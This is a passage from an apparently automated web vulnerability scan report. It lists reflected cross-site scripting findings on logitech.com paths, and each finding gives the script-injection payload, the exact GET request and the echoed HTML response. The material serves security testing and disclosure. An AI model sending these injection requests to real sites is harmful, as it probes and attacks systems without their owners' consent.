Server: Apache
Date: Fri, 12 Nov 2010 13:00:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn2172b</script><script>alert(1)</script>ec6039f9226/navigation/bg-nav-headers' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.
...[SNIP]...

1.138. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab32f"><script>alert(1)</script>e426beefa42 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/cmnab32f"><script>alert(1)</script>e426beefa42/navigation/bg-nav-headers/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmnab32f"><script>alert(1)</script>e426beefa42/navigation/bg-nav-headers">
...[SNIP]...

1.139. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a03e7</script><script>alert(1)</script>1de8844da04 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn/navigationa03e7</script><script>alert(1)</script>1de8844da04/bg-nav-headers/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn/navigationa03e7</script><script>alert(1)</script>1de8844da04/bg-nav-headers' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.co
...[SNIP]...

1.140. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7653b"><script>alert(1)</script>7fe941f2f96 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/cmn/navigation7653b"><script>alert(1)</script>7fe941f2f96/bg-nav-headers/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmn/navigation7653b"><script>alert(1)</script>7fe941f2f96/bg-nav-headers">
...[SNIP]...

1.141. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e4ba"><script>alert(1)</script>57abedc4949 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/cmn/navigation/bg-nav-headers5e4ba"><script>alert(1)</script>57abedc4949/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmn/navigation/bg-nav-headers5e4ba"><script>alert(1)</script>57abedc4949">
...[SNIP]...

1.142. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91f8f</script><script>alert(1)</script>e3e3d1142a7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn/navigation/bg-nav-headers91f8f</script><script>alert(1)</script>e3e3d1142a7/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn/navigation/bg-nav-headers91f8f</script><script>alert(1)</script>e3e3d1142a7' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.143. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/en.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/en.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e234d</script><script>alert(1)</script>9bd87dee77b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn/navigation/bg-nav-headers/en.csse234d</script><script>alert(1)</script>9bd87dee77b HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:29 GMT
Connection: keep-alive
Content-Length: 31545


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn/navigation/bg-nav-headers/en.csse234d</script><script>alert(1)</script>9bd87dee77b' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.144. http://www.logitech.com/css/v2/cmn/navigation/bg-nav-headers/en.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/navigation/bg-nav-headers/en.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1818c"><script>alert(1)</script>5ef0f52c19a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/cmn/navigation/bg-nav-headers/en.css1818c"><script>alert(1)</script>5ef0f52c19a HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:24 GMT
Connection: keep-alive
Content-Length: 31513


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmn/navigation/bg-nav-headers/en.css1818c"><script>alert(1)</script>5ef0f52c19a">
...[SNIP]...

1.145. http://www.logitech.com/css/v2/cmn/print.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/print.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae4af"><script>alert(1)</script>0c2b3d08c4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/cmn/print.cssae4af"><script>alert(1)</script>0c2b3d08c4 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:24 GMT
Connection: keep-alive
Content-Length: 31393


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/cmn/print.cssae4af"><script>alert(1)</script>0c2b3d08c4">
...[SNIP]...

1.146. http://www.logitech.com/css/v2/cmn/print.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/print.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5173a</script><script>alert(1)</script>cbab8300107 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/cmn/print.css5173a</script><script>alert(1)</script>cbab8300107 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:31 GMT
Connection: keep-alive
Content-Length: 31430


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/cmn/print.css5173a</script><script>alert(1)</script>cbab8300107' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.147. http://www.logitech.com/css/v2/combined.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/combined.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc770</script><script>alert(1)</script>a866c9d71b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/combined.cssbc770</script><script>alert(1)</script>a866c9d71b HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:29 GMT
Connection: keep-alive
Content-Length: 31420


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/combined.cssbc770</script><script>alert(1)</script>a866c9d71b' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.148. http://www.logitech.com/css/v2/combined.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/combined.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27121"><script>alert(1)</script>ca44c5e3751 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/combined.css27121"><script>alert(1)</script>ca44c5e3751 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:23 GMT
Connection: keep-alive
Content-Length: 31393


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/combined.css27121"><script>alert(1)</script>ca44c5e3751">
...[SNIP]...

1.149. http://www.logitech.com/css/v2/homepage.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/homepage.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd4bb"><script>alert(1)</script>752052b3a53 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/homepage.csscd4bb"><script>alert(1)</script>752052b3a53 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:24 GMT
Connection: keep-alive
Content-Length: 31393


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/homepage.csscd4bb"><script>alert(1)</script>752052b3a53">
...[SNIP]...

1.150. http://www.logitech.com/css/v2/homepage.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/homepage.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81793</script><script>alert(1)</script>cc47607ccab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/homepage.css81793</script><script>alert(1)</script>cc47607ccab HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:31 GMT
Connection: keep-alive
Content-Length: 31425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/homepage.css81793</script><script>alert(1)</script>cc47607ccab' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.151. http://www.logitech.com/css/v2/homepage_print.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/homepage_print.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6caee"><script>alert(1)</script>65dd3ca138f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/homepage_print.css6caee"><script>alert(1)</script>65dd3ca138f HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:43 GMT
Connection: keep-alive
Content-Length: 31423


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/homepage-print.css6caee"><script>alert(1)</script>65dd3ca138f">
...[SNIP]...

1.152. http://www.logitech.com/css/v2/homepage_print.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/homepage_print.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68be9</script><script>alert(1)</script>5272fcf4652 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/homepage_print.css68be9</script><script>alert(1)</script>5272fcf4652 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:50:00 GMT
Connection: keep-alive
Content-Length: 31455


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/homepage-print.css68be9</script><script>alert(1)</script>5272fcf4652' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.153. http://www.logitech.com/css/v2/mobile.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/mobile.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2eeb"><script>alert(1)</script>0b35e17aaf4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/mobile.cssc2eeb"><script>alert(1)</script>0b35e17aaf4 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:30 GMT
Connection: keep-alive
Content-Length: 31383


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/mobile.cssc2eeb"><script>alert(1)</script>0b35e17aaf4">
...[SNIP]...

1.154. http://www.logitech.com/css/v2/mobile.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/mobile.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b39ea</script><script>alert(1)</script>b88e47674bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

